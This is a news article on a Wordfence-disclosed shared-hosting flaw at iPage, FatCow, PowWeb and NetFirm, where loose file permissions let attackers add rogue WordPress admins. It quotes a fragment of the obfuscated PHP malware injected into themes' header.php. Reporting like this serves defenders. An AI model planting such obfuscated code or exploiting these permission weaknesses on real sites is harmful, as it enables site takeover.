WordFence announced that they had discovered a vulnerability at four hosting companies. WordFence warns that while the vulnerability was patched, it’s possible sites were hacked prior to the fix.
Server settings allowed hackers to create WordPress administrator accounts from which the sites could be exploited with rogue code added to the WordPress theme.
WordFence urged site administrators to check their sites for rogue administrator accounts if they are hosted on iPage, FatCow, PowWeb, or NetFirm. All four are owned by the same company, Endurance International Group.
What Was the Server Vulnerability?
The affected servers had permission and file settings that allowed an attacker to view sensitive files. Other vulnerabilities allowed the attackers to access the database, add themselves as an administrators then take over the site.
This is how WordFence described the vulnerability:
“Four conditions existed that contributed to this vulnerability:
1. Customer files are all stored on a shared file system.
2. The full path to a user’s web root directory was public or could be guessed.
3. All directories in the path to a customer’s site root directory were either world-traversable (the execute bit for ‘all users’ is 1) or group-traversable (the execute bit for ‘group’ is 1), and the sensitive files were world-readable (the read bit for ‘all users’ is 1) or group-readable (the read bit for ‘group’ is 1).
4. An attacker could cause a program running in the group www to read files in arbitrary locations.”
Sites Could be Infected
WordFence warned that there was a period of time before the vulnerability was fixed during which sites hosted on these four host providers could have been infected.
It is recommended that site owners check their user lists to make sure there are no unauthorized administrators. If your site has been affected, then there should be rogue code that was added to the theme.
Here is how WordFence described the rogue code:
“If your site was exploited before the fixes, the attackers may have added malware which could still be present. Our customers had obfuscated code added at the top of the active theme’s header.php file, similar to this:
<?php ${“\x47\x4c\x4f\x42\x41\x4c\x53”}[“dd\x70\x68z\x67\x64gx”]=”sl\x77k\x77i”;${“\x47\x4cO\x42\x41L\x53”}[“c\x7a\x66\x6dubkdo\x6a\x78″]=”\x6c\x6f\x63\x61t\x69\x6fn”;${“\x47\x4c\x4fB\x41LS”}[“\x67\x64\x64e\x74\x62p\x75f\x65i”]=”\x68t\x6d\x6c”;${“\x47\x4cOB\x41\x4cS”}[“\x77i\x64\x68\x6bv\x6da”]=”\x73t\x72\x66″;${“\x47\x4c\x4f\x42\x41\x4c\x53”}[“\x66s\x75\x71\x79\x6evw”]=”b\x6f\x74″;${“\x47\x4cOBAL\x53”}[“w\x6c\x79\x63\x61\x76\x62\x71\x68\x6f\x6c\x75″]=”cac\x68\x65”;${“G\x4cO\x42\x41L\x53”}[“ry\x68\x72ku\x6b”]=”\x73\x63h\x65\x6d\x65″;${“\x47\x4c\x4f\x42\x41L\x53”}[“\x74\x6a\x6bc\x64e\x65\x69w”]=”\x73l\x77k\x77i\x32″;${“G\x4cOBA\x4cS”}[“\x79\x65\x64\x73\x67\x6ah\x69\x73\x67″]=”\x73\x6c\x74l\x65\x69l\x73″;”
Vulnerability Has Been Fixed
WordFence disclosed the vulnerability to the hosting companies before making a public announcement. The hosting companies promptly fixed the vulnerabilities.
Nevertheless, according to the guidance offered by WordFence, you may wish to check your user lists for rogue admin level accounts and review your header.php file for rogue code.
Read the entire announcement at the WordFence blog
Images by Shutterstock, Modified by Author